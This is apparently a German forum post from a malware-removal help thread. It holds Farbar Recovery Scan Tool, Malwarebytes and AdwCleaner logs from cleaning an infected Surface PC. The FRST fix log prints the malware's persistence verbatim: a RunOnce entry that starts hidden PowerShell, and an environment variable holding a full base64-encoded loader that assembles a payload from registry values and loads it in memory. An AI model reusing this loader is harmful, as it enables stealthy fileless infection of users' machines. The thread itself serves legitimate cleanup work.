| Gaudissimo | 05.02.2021 11:52 |
Hallo Matthias,
vielen Dank für die schnelle Bearbeitung!
Ich würde dir gerne eine genaue Auskunft geben. Es sollte eine gepackte Datei gewesen sein mit User-Content für Sims 3 ... habe dieses Archiv aber nicht mehr.
Zunächst kam beim zweimaligen Neustart schon mal keine Defender-Warnung mehr. Hier die Infos in der gewünschten Reihenfolge:
FRST-Fix: Code:
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 04-02-2021
durchgeführt von richa (05-02-2021 11:27:16) Run:1
Gestartet von C:\Users\richa\Desktop
Geladene Profile: richa
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
CloseProcesses:
CMD: reg query HKCU\Environment
HKU\S-1-5-21-570092518-3918108528-2642111008-1001\...\RunOnce: [richa] => powershell -Win Hi -Command "$r = [Environment]::GetEnvironmentVariable('richa', 'User').split();$p=$r[0];$r[0]='';Start-Process $p -ArgumentList ($r -join ' ') -Win Hi" <==== ACHTUNG
HKU\S-1-5-21-570092518-3918108528-2642111008-1001\Environment: [richa] "powershell.exe" -windowstyle hidden -En "PAAjACAAdQB2AGcAaQB5AHIAeQBrACAAIwA+ACQAdQA9ACQAZQBuAHYAOgBVAHMAZQByAE4AYQBtAGUAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAANwAwADAAOwAkAGk (Der Dateneintrag hat 1257 mehr Zeichen). <==== ACHTUNG
DeleteKey: HKCU\Software\CurrentUserName
DeleteKey: HKCU\Software\richa
DeleteKey: HKCU\Software\CurrentUserName1
DeleteKey: HKCU\Software\richa1
CMD: reg query HKCU\Software
CMD: reg query HKCU\Environment
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Beschränkung <==== ACHTUNG
AV: Total AV (Disabled - Up to date) {B185458D-38B3-A010-10F7-3D378DAA6032}
2021-02-04 06:57 - 2021-02-04 06:57 - 000000000 ____D C:\Users\richa\Documents\TotalAV
2021-02-04 06:55 - 2021-02-04 06:55 - 000000000 ____D C:\Users\richa\AppData\Local\GUI.Win
2021-02-04 06:55 - 2021-02-04 06:55 - 000000000 ____D C:\ProgramData\SecuritySuite
2021-02-04 06:54 - 2021-02-04 06:55 - 000000000 ____D C:\ProgramData\TotalAV
2021-02-05 08:49 - 2020-05-13 10:37 - 000021976 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\amselam.sys
CMD: ipconfig /flushdns
CMD: netsh winsock reset
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: Bitsadmin /Reset /Allusers
powershell: Set-MpPreference -PUAProtection Enabled
powershell: Set-MpPreference -DisableScanningNetworkFiles 0
Hosts:
RemoveProxy:
SystemRestore: On
EmptyTemp:
*****************
Prozesse erfolgreich geschlossen.
========= reg query HKCU\Environment =========
HKEY_CURRENT_USER\Environment
Path REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;
TEMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp
TMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp
OneDrive REG_EXPAND_SZ C:\Users\richa\OneDrive
OneDriveConsumer REG_EXPAND_SZ C:\Users\richa\OneDrive
richa REG_SZ "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -En "PAAjACAAdQB2AGcAaQB5AHIAeQBrACAAIwA+ACQAdQA9ACQAZQBuAHYAOgBVAHMAZQByAE4AYQBtAGUAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAANwAwADAAOwAkAGkAKwArACkAewAkAGMAPQAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcACIAKwAkAHUAKwAiADEAIgA7AFQAcgB5AHsAJABhAD0AJABhACsAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAJABjACkALgAkAGkAfQBDAGEAdABjAGgAewB9AH0AOwBmAHUAbgBjAHQAaQBvAG4AIABjAGgAYgBhAHsAWwBjAG0AZABsAGUAdABiAGkAbgBkAGkAbgBnACgAKQBdAHAAYQByAGEAbQAoAFsAcABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQApAF0AWwBTAHQAcgBpAG4AZwBdACQAaABzACkAOwAkAEIAeQB0AGUAcwAgAD0AIABbAGIAeQB0AGUAWwBdAF0AOgA6AG4AZQB3ACgAJABoAHMALgBMAGUAbgBnAHQAaAAgAC8AIAAyACkAOwBmAG8AcgAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABoAHMALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkAewAkAEIAeQB0AGUAcwBbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAGgAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAyACkALAAgADEANgApAH0AJABCAHkAdABlAHMAfQA7ACQAaQAgAD0AIAAwADsAVwBoAGkAbABlACAAKAAkAFQAcgB1AGUAKQB7ACQAaQArACsAOwAkAGsAbwAgAD0AIABbAG0AYQB0AGgAXQA6ADoAUwBxAHIAdAAoACQAaQApADsAaQBmACAAKAAkAGsAbwAgAC0AZQBxACAAMQAwADAAMAApAHsAIABiAHIAZQBhAGsAfQB9AFsAYgB5AHQAZQBbAF0AXQAkAGIAIAA9ACAAYwBoAGIAYQAoACQAYQAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAKQA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABiACkAOwBbAE0AbwBkAGUAXQA6ADoAUwBlAHQAdQBwACgAKQA7AA== "
========= Ende von CMD: =========
"HKU\S-1-5-21-570092518-3918108528-2642111008-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\\richa" => erfolgreich entfernt
"HKU\S-1-5-21-570092518-3918108528-2642111008-1001\Environment\\richa" => erfolgreich entfernt
HKCU\Software\CurrentUserName => nicht gefunden
HKCU\Software\richa => erfolgreich entfernt
HKCU\Software\CurrentUserName1 => nicht gefunden
HKCU\Software\richa1 => erfolgreich entfernt
========= reg query HKCU\Software =========
HKEY_CURRENT_USER\Software\9b08bea4-021c-5f9d-a74e-ac0ceb51fb28
HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\BandLab Assistant
HKEY_CURRENT_USER\Software\Brother
HKEY_CURRENT_USER\Software\Cakewalk Music Software
HKEY_CURRENT_USER\Software\CASIO
HKEY_CURRENT_USER\Software\CeWe Color
HKEY_CURRENT_USER\Software\Chromium
HKEY_CURRENT_USER\Software\Cisco
HKEY_CURRENT_USER\Software\Clients
HKEY_CURRENT_USER\Software\Colossal Order
HKEY_CURRENT_USER\Software\DriverHub
HKEY_CURRENT_USER\Software\Dropbox
HKEY_CURRENT_USER\Software\DropboxUpdate
HKEY_CURRENT_USER\Software\drpsu
HKEY_CURRENT_USER\Software\Electronic Arts
HKEY_CURRENT_USER\Software\FX-MAX
HKEY_CURRENT_USER\Software\Google
HKEY_CURRENT_USER\Software\lukasarts
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Mozilla
HKEY_CURRENT_USER\Software\MozillaPlugins
HKEY_CURRENT_USER\Software\Native Instruments
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\OCS
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Overloud
HKEY_CURRENT_USER\Software\paint.net
HKEY_CURRENT_USER\Software\Paradox Interactive
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\QtProject
HKEY_CURRENT_USER\Software\Realtek
HKEY_CURRENT_USER\Software\RegisteredApplications
HKEY_CURRENT_USER\Software\SpitfireAudio
HKEY_CURRENT_USER\Software\Spotify
HKEY_CURRENT_USER\Software\SSProtect
HKEY_CURRENT_USER\Software\SyncEngines
HKEY_CURRENT_USER\Software\Team17DigitalLTD
HKEY_CURRENT_USER\Software\Valve
HKEY_CURRENT_USER\Software\WebEx
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\ZoomUMX
HKEY_CURRENT_USER\Software\Classes
========= Ende von CMD: =========
========= reg query HKCU\Environment =========
HKEY_CURRENT_USER\Environment
Path REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;
TEMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp
TMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp
OneDrive REG_EXPAND_SZ C:\Users\richa\OneDrive
OneDriveConsumer REG_EXPAND_SZ C:\Users\richa\OneDrive
========= Ende von CMD: =========
HKLM\SOFTWARE\Policies\Mozilla => erfolgreich entfernt
"AV: Total AV (Disabled - Up to date) {B185458D-38B3-A010-10F7-3D378DAA6032}" => erfolgreich entfernt
C:\Users\richa\Documents\TotalAV => erfolgreich verschoben
C:\Users\richa\AppData\Local\GUI.Win => erfolgreich verschoben
C:\ProgramData\SecuritySuite => erfolgreich verschoben
C:\ProgramData\TotalAV => erfolgreich verschoben
C:\WINDOWS\system32\Drivers\amselam.sys => erfolgreich verschoben
========= ipconfig /flushdns =========
Windows-IP-Konfiguration
Der DNS-Aufl”sungscache wurde geleert.
========= Ende von CMD: =========
========= netsh winsock reset =========
Der Winsock-Katalog wurde zurckgesetzt.
Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen.
========= Ende von CMD: =========
========= netsh advfirewall reset =========
OK.
========= Ende von CMD: =========
========= netsh advfirewall set allprofiles state ON =========
OK.
========= Ende von CMD: =========
========= Bitsadmin /Reset /Allusers =========
BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.
Unable to cancel {DB9A3E83-6CA1-4BB8-A304-DE0EABA80F8C}.
{998AF32E-A3C0-4F9C-BAC1-C8856574FEC7} canceled.
1 out of 2 jobs canceled.
========= Ende von CMD: =========
========= Set-MpPreference -PUAProtection Enabled =========
========= Ende von Powershell: =========
========= Set-MpPreference -DisableScanningNetworkFiles 0 =========
========= Ende von Powershell: =========
C:\Windows\System32\Drivers\etc\hosts => erfolgreich verschoben
Hosts erfolgreich wiederhergestellt.
========= RemoveProxy: =========
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-570092518-3918108528-2642111008-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-570092518-3918108528-2642111008-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
========= Ende von RemoveProxy: =========
SystemRestore: On => abgeschlossen
=========== EmptyTemp: ==========
BITS transfer queue => 10510336 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 276641749 B
Java, Flash, Steam htmlcache => 347808051 B
Windows/system/drivers => 12083881 B
Edge => 8994056 B
Chrome => 417966736 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 16590 B
NetworkService => 350990 B
richa => 659006273 B
RecycleBin => 58771253 B
EmptyTemp: => 1.7 GB temporäre Dateien entfernt.
================================
Das System musste neu gestartet werden.
==== Ende von Fixlog 11:28:27 ====
MBRAM Code:
Malwarebytes
www.malwarebytes.com
-Protokolldetails-
Scan-Datum: 05.02.21
Scan-Zeit: 11:32
Protokolldatei: 6b9a7c4a-679d-11eb-bc4c-c49ded198b13.json
-Softwaredaten-
Version: 4.3.0.98
Komponentenversion: 1.0.1157
Version des Aktualisierungspakets: 1.0.36753
Lizenz: Testversion
-Systemdaten-
Betriebssystem: Windows 10 (Build 19041.746)
CPU: x64
Dateisystem: NTFS
Benutzer: Surface\richa
-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Scan gestartet von: Manuell
Ergebnis: Abgeschlossen
Gescannte Objekte: 291184
Erkannte Bedrohungen: 6
In die Quarantäne verschobene Bedrohungen: 6
Abgelaufene Zeit: 3 Min., 42 Sek.
-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Aktiviert
Heuristik: Aktiviert
PUP: Erkennung
PUM: Erkennung
-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)
Modul: 0
(keine bösartigen Elemente erkannt)
Registrierungsschlüssel: 3
PUP.Optional.DriverPack, HKLM\SOFTWARE\WOW6432NODE\DRPSU, In Quarantäne, 8344, 472300, 1.0.36753, , ame, , ,
PUP.Optional.DriverPack, HKU\S-1-5-21-570092518-3918108528-2642111008-1001\SOFTWARE\DRPSU, In Quarantäne, 8344, 472301, 1.0.36753, , ame, , ,
PUP.Optional.DriverPack, HKU\S-1-5-21-570092518-3918108528-2642111008-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\DOMAINS\drp.su, In Quarantäne, 8344, 472299, 1.0.36753, , ame, , ,
Registrierungswert: 2
PUP.Optional.DriverPack, HKLM\SOFTWARE\WOW6432NODE\DRPSU|CLIENTID, In Quarantäne, 8344, 472300, 1.0.36753, , ame, , ,
PUP.Optional.DriverPack, HKU\S-1-5-21-570092518-3918108528-2642111008-1001\SOFTWARE\DRPSU|CLIENTID, In Quarantäne, 8344, 472301, 1.0.36753, , ame, , ,
Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)
Daten-Stream: 0
(keine bösartigen Elemente erkannt)
Ordner: 1
PUP.Optional.DriverPack.BITSRST, C:\USERS\RICHA\APPDATA\ROAMING\DRPSU, In Quarantäne, 15657, 820473, 1.0.36753, , ame, , ,
Datei: 0
(keine bösartigen Elemente erkannt)
Physischer Sektor: 0
(keine bösartigen Elemente erkannt)
WMI: 0
(keine bösartigen Elemente erkannt)
(end)
AdwCleaner Code:
# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.1
# -------------------------------
# Build: 01-20-2021
# Database: 2021-01-26.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 02-05-2021
# Duration: 00:00:01
# OS: Windows 10 Pro
# Cleaned: 6
# Failed: 0
***** [ Services ] *****
No malicious services cleaned.
***** [ Folders ] *****
Deleted C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\TotalAV
***** [ Files ] *****
Deleted C:\END
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
No malicious tasks cleaned.
***** [ Registry ] *****
Deleted HKCU\Software\SSProtect
Deleted HKLM\SOFTWARE\Google\Chrome\NativeMessagingHosts\com.totalav.passwordvaultassistant
Deleted HKLM\SOFTWARE\Mozilla\NativeMessagingHosts\com.totalav.passwordvaultassistant
Deleted HKLM\System\CurrentControlSet\Services\EventLog\Application\SecurityService
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
No malicious Chromium URLs cleaned.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
***** [ Hosts File Entries ] *****
No malicious hosts file entries cleaned.
***** [ Preinstalled Software ] *****
No Preinstalled Software cleaned.
*************************
[+] Delete Tracing Keys
[+] Reset Winsock
*************************
AdwCleaner[S00].txt - [1843 octets] - [05/02/2021 11:39:46]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
FRST Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 04-02-2021
durchgeführt von richa (Administrator) auf SURFACE (Microsoft Corporation Surface Pro) (05-02-2021 11:41:29)
Gestartet von C:\Users\richa\Desktop
Geladene Profile: richa
Platform: Windows 10 Pro Version 20H2 19042.746 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: Edge
Start-Modus: Normal
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Dropbox, Inc -> Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation -> ) C:\Program Files (x86)\Microsoft\Edge\Application\88.0.705.56\identity_helper.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <8>
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2012.21.0_x64__8wekyb3d8bbwe\Calculator.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20566.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\hdxsstm.inf_amd64_1a1e8196b6801ccf\RtkAudUService64.exe
==================== Registry (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\DriverStore\FileRepository\hdxsstm.inf_amd64_1a1e8196b6801ccf\RtkAudUService64.exe [835904 2020-04-17] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [500208 2010-03-06] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [7992336 2021-02-03] (Dropbox, Inc -> Dropbox, Inc.)
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [Datei ist nicht signiert]
HKLM-x32\...\Run: [AdobeCS5ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe [406992 2010-02-22] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKU\S-1-5-21-570092518-3918108528-2642111008-1001\...\Run: [Spotify] => C:\Users\richa\AppData\Roaming\Spotify\Spotify.exe [23597640 2021-02-01] (Spotify AB -> Spotify Ltd)
HKU\S-1-5-21-570092518-3918108528-2642111008-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3411232 2020-12-21] (Valve -> Valve Corporation)
HKU\S-1-5-21-570092518-3918108528-2642111008-1001\...\Run: [BandLab Assistant.app] => C:\Users\richa\AppData\Local\Programs\bandlab-assistant\BandLab Assistant.exe [92030896 2020-05-22] (BandLab Singapore Pte Ltd. -> BandLab)
HKU\S-1-5-21-570092518-3918108528-2642111008-1001\...\Run: [CiscoMeetingDaemon] => C:\Users\richa\AppData\Local\WebEx\ciscowebexstart.exe [2499784 2021-01-30] (Cisco WebEx LLC -> Cisco Webex LLC)
HKLM\...\Print\Monitors\HP 7112 Status Monitor: C:\WINDOWS\system32\hpinksts7112LM.dll [328704 2013-08-23] (Microsoft Windows Hardware Compatibility Publisher -> Hewlett-Packard Co.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\88.0.4324.146\Installer\chrmstp.exe [2021-02-04] (Google LLC -> Google LLC)
Startup: C:\Users\richa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\An OneNote senden.lnk [2021-02-04]
ShortcutTarget: An OneNote senden.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {491F0BBF-BCF9-480A-875E-34F4422EB9CF} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [1126296 2021-02-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {4D3C2604-6654-497F-BBDC-0415CF2E0BE4} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2019-03-24] (Dropbox, Inc -> Dropbox, Inc.)
Task: {4FC486A8-C6A3-4D16-A798-459A0280FB32} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115048 2021-02-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {65FCC95B-D4C8-48D0-A420-4A6DBD96B7BD} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22993288 2021-01-22] (Microsoft Corporation -> Microsoft Corporation)
Task: {7A944CEE-B83F-40BF-BD6E-70E8B8D35EDB} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115048 2021-02-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {7BC9592C-55F2-4364-B6FF-3B0EE686D22C} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22993288 2021-01-22] (Microsoft Corporation -> Microsoft Corporation)
Task: {929A2BCE-411A-49C4-B8A0-15A9574D2E09} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-02-17] (Google Inc -> Google Inc.)
Task: {AE4AD26C-C3FD-4D35-BB11-412E0E88557F} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2019-03-24] (Dropbox, Inc -> Dropbox, Inc.)
Task: {B0031AF4-9E97-424C-8DA8-FAC23902559E} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {B679A3E8-041A-4B31-A01C-8C3FF6C4CF75} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {C595D079-4BA7-4887-9522-0BE91B805EE0} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-02-17] (Google Inc -> Google Inc.)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{d7edfed4-57c2-437c-90f0-ca6bc2d293f9}: [DhcpNameServer] 192.168.1.1
Edge:
=======
DownloadDir: C:\Users\richa\Downloads
Edge Notifications: HKU\S-1-5-21-570092518-3918108528-2642111008-1001 -> hxxps://wowroms.com; hxxps://padlet.com; hxxps://igs-bothfeld.org
Edge DefaultProfile: Default
Edge Profile: C:\Users\richa\AppData\Local\Microsoft\Edge\User Data\Default [2021-02-05]
Edge DownloadDir: C:\Users\richa\Downloads
Edge Notifications: Default -> hxxps://igs-bothfeld.org; hxxps://padlet.com; hxxps://wowroms.com; hxxps://www.prosieben.de
Edge HomePage: Default -> hxxp://go.microsoft.com/fwlink/p/?LinkId=619797&pc=UE01&ocid=UE01DHP
FireFox:
========
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2018-08-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2021-02-03] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\richa\AppData\Local\Google\Chrome\User Data\Default [2021-02-05]
CHR Notifications: Default -> hxxps://www.facebook.com
CHR Extension: (Präsentationen) - C:\Users\richa\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-17]
CHR Extension: (Docs) - C:\Users\richa\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-17]
CHR Extension: (Google Drive) - C:\Users\richa\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-11-30]
CHR Extension: (YouTube) - C:\Users\richa\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-17]
CHR Extension: (Tabellen) - C:\Users\richa\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-17]
CHR Extension: (Google Docs Offline) - C:\Users\richa\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-11-30]
CHR Extension: (Avast Online Security) - C:\Users\richa\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2020-06-08]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\richa\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-02-03]
CHR Extension: (Google Mail) - C:\Users\richa\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-11-30]
CHR Extension: (Chrome Media Router) - C:\Users\richa\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2021-02-03]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki]
==================== Dienste (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8902024 2021-01-22] (Microsoft Corporation -> Microsoft Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2019-03-24] (Dropbox, Inc -> Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2019-03-24] (Dropbox, Inc -> Dropbox, Inc.)
R2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [44064 2021-02-03] (Dropbox, Inc -> Dropbox, Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7456464 2021-02-05] (Malwarebytes Inc -> Malwarebytes)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2533952 2021-01-21] (Electronic Arts, Inc. -> Electronic Arts)
S2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3479624 2021-01-21] (Electronic Arts, Inc. -> Electronic Arts)
